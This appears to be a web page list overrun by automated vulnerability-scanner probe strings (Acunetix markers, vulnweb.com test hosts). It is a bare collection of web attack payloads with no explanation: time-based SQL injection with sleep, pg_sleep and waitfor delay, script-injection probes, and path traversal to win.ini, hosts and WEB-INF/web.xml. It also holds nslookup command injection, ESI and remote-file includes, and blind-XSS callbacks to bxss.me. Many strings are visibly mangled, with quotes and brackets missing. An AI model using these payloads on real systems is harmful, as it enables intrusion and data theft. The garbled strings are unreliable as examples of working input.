• 1
  • 1()&acxScRiPt OyW3(9298)/ScRiPt
  • \
  • /www.vulnweb.com
  • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • (select(0)from(select(sleep(6)))v)/+(select(0)from(select(sleep(6)))v)++(select(0)from(select(sleep(6)))v)+/
  • 1
  • 0XOR(if(now()=sysdate(),sleep(6),0))XORZ
  • action/.
  • 0XOR(if(now()=sysdate(),sleep(6),0))XORZ
  • action
  • http://hit1VNNS3ObYN.bxss.me/
  • if(now()=sysdate(),sleep(3),0)
  • action
  • print(md5(acunetix_wvs_security_test))\
  • OUvahWyC))select pg_sleep(3)
  • testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))
  • Bs2AGUvM)select pg_sleep(3)
  • HttP://testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))a=
  • Mpwpz4Spselect pg_sleep(9)
  • ^(!)(()))
  • print(md5(acunetix_wvs_security_test))a=
  • 1))select pg_sleep(9)
  • !(()&&!|||
  • print(md5(acunetix_wvs_security_test))
  • 1)select pg_sleep(9)
  • )
  • &n963406=v985197
  • 1select pg_sleep(6)
  • FLnX9UXG)) waitfor delay 0:0:6
  • WEBINF\web.xml
  • testasp.vulnweb.com
  • pFfd1d0Z) waitfor delay 0:0:6
  • WEBINF/web.xml
  • http://testasp.vulnweb.com/t/fit.txt?.jpg
  • RjAhlT6l waitfor delay 0:0:3
  • Http://testasp.vulnweb.com/t/fit.txt
  • 1 waitfor delay 0:0:3
  • 1some_inexistent_file_with_long_name
  • 1)) waitfor delay 0:0:3
  • ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • http://someinexistentwebsite.acu/some_inexistent_file_with_long_name?.jpg
  • 1) waitfor delay 0:0:3
  • ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • 10000247+10000395
  • 1 waitfor delay 0:0:3
  • /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  • esi:include src=http://testasp.vulnweb.com/rpb.png/
  • 1 OR 2+1891891=0+0+0+1
  • ..\..\..\..\..\..\..\..\windows\win.ini
  • 1 OR 2+1121121=0+0+0+1 or JIlQKoAL=
  • 12345\\)|]
  • ................windowswin.ini
  • 1 OR 2+7277271=0+0+0+1
  • ????????????????????????????????????????????????windows??win.ini
  • 1 OR 2+4804801=0+0+0+1
  • ../../../../../../../../../../windows/win.ini
  • 1 OR 2+3843841=0+0+0+1
  • &nslookup gqT1BfxP&\`0&nslookup gqT1BfxP&`
  • C:\WINDOWS\system32\drivers\etc\hosts
  • DB882Msy
  • (nslookup Kfzsm6Dk)
  • ../../../../../../../../../../windows/win.ini
  • 1
  • a7wnZUnh
  • set|set&set
  • 1
  • +response.write(90738739276592)+
  • +response.write(90738739276592)+
  • response.write(90738739276592)
  • 19887700
  • ()&acxScRiPt wrzn(9926)/ScRiPt
  • 1()&acxScRiPt wrzn(9085)/ScRiPt
  • &n974504=v904734
  • ??
  • ??
  • JyI=
  • 19802433
  • s4Mpx
  • ()&acxScRiPt Wmeo(9339)/ScRiPt
  • 1
  • 1()&acxScRiPt Wmeo(9194)/ScRiPt
  • /www.vulnweb.com
  • \
  • 1
  • print(md5(acunetix_wvs_security_test))\
  • http://hitNfQFAo4oNa.bxss.me/
  • print(md5(acunetix_wvs_security_test))
  • action/.
  • print(md5(acunetix_wvs_security_test))a=
  • action
  • print(md5(acunetix_wvs_security_test))a=
  • action
  • print(md5(acunetix_wvs_security_test))
  • WEBINF\web.xml
  • testasp.vulnweb.com
  • WEBINF/web.xml